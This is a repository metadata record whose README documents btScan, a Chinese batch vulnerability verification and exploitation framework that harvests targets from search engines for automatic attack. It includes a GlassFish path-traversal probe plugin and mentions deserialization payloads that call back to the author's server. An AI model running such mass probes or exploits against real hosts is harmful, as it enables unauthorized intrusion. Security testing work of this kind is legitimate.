{"id":13843969,"url":"https://github.com/he1m4n6a/btScan","last_synced_at":"2025-07-11T20:30:58.278Z","repository":{"id":49539833,"uuid":"48462904","full_name":"he1m4n6a/btScan","owner":"he1m4n6a","description":"批量漏洞扫描框架","archived":false,"fork":false,"pushed_at":"2024-04-24T15:37:57.000Z","size":463,"stargazers_count":122,"open_issues_count":1,"forks_count":62,"subscribers_count":9,"default_branch":"master","last_synced_at":"2024-11-21T15:39:38.230Z","etag":null,"topics":["batch-script","security-scanner"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/he1m4n6a.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-12-23T01:46:50.000Z","updated_at":"2024-11-01T02:37:39.000Z","dependencies_parsed_at":"2024-11-21T15:43:42.669Z","dependency_job_id":null,"html_url":"https://github.com/he1m4n6a/btScan","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/he1m4n6a/btScan","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/he1m4n6a","download_url":"https://codeload.github.com/he1m4n6a/btScan/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264892048,"owners_count":23679211,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["batch-script","security-scanner"],"created_at":"2024-08-04T17:02:31.709Z","updated_at":"2025-07-11T20:30:57.714Z","avatar_url":"https://github.com/he1m4n6a.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"## 目录结构\n\n    --lib 核心文件库\n\n    --report 报告生成的文件夹\n\n    --node 里面每一个py文件是一个攻击向量，添加扫描节点也是向里面添加文件\n\n    --crawl 通过空间搜索引擎抓取url或者ip的脚本\n    \n\n## 使用方法\n    python btScan.py\n    usage: btScan.py [options]\n    \n    * batch vulnerability verification and exploition framework. *\n    By he1m4n6a\n    \n    optional arguments:\n      -h, --help   show this help message and exit\n      -t THREADS   Num of scan threads for each scan process, 20 by default\n      -m MODE      select mode [config|script]\n                   e.g. -m script\n      -n NAME      from node floder choose a script\n      -c COMMAND   give an instruction when use script mode [verify|exploit]\n                   e.g. -c verify\n      -u URL_FILE  input url file\n      -i IP_FILE   input ip file\n      -autoIP      get ip from space search engine and auto attack\n      -autoURL     get url from space search engine and auto attack\n      -v           show program's version number and exit\n\n脚本存在两种验证模式，一种是通过加载模块，另一种是通过配置文件。复杂的可以通过加载脚本，简单的通过加载配置文件即可。然后攻击也有两种模式，验证verify模式和攻击exploit模式。 你也可以指定ip或者url作为输入格式，也可以自动获取ip或者url，那就是配合crawl文件下的网络空间抓取模块。\n\n**示例**\n```\npython btscan.py -n joomla -m script -c verify -u url.txt\n-n 指定node文件夹下的joomla.py，-m指定为script模式，即指定加载模块的模式。-c指定模式为验证，仅为验证就好了，-u指定输入为url的模式。\n```\n```\npython btscan.py -n joomla -m script -c exploit -u url.txt\n同上，只是指定为攻击模式。\n```\n```\npython btscan.py  -m config -c verify -i ip.txts\n-m指定为config模式，-c指定为验证模式，-i指定输入的为ip模式，仅需通过conf目录下的scan_rule.ini的配置就够了。\n```\n\n\n## 插件编写规则\n\n仅需要在node文件夹下新增一个py文件\n\npy文件中重要的有两个函数verify和exploit函数，没有exploit攻击模式，仅需要verify函数，返回值有三个值，第一个值是返回是否存在漏洞，返回True或者False；第二个值是返回url，第三个值返回需要打印的信息。\n\n***示例(glassfish.py为例)***\n\n```\n#!/usr/bin/env python\n#coding=utf8\n\nimport requests\n\ndef verify(ip):\n    url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'\n    try:\n        r = requests.get(url, verify=False, timeout=5)\n        if 'ejb-timer-service-app' in r.text:\n            msg = 'vul'\n            return True, ip, msg\n\telse:\n            msg = 'safe'\n            return False, ip, msg\n    except Exception, e:\n        #msg = str(e)\n\tmsg = 'safe'\n        return False, ip, msg\n\n\ndef exploit(ip):\n    verify(ip)\n```\n上面函数都可以自己定义，主要是verfiy和exploit函数，如果exploit函数和verify函数一样，exploit函数里面只要简单的调用verify(url)即可。\n\n## 其他\n\ncrwal文件夹的NetSearch.py里面的shadon和censys模块的密钥要自己填上。\njava反序列化的payload要自行更改，不然结果是发送到我的vps上。\n\n有任何交流和问题可以联系我he1m4n6a@163.com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhe1m4n6a%2FbtScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhe1m4n6a%2FbtScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhe1m4n6a%2FbtScan/lists"}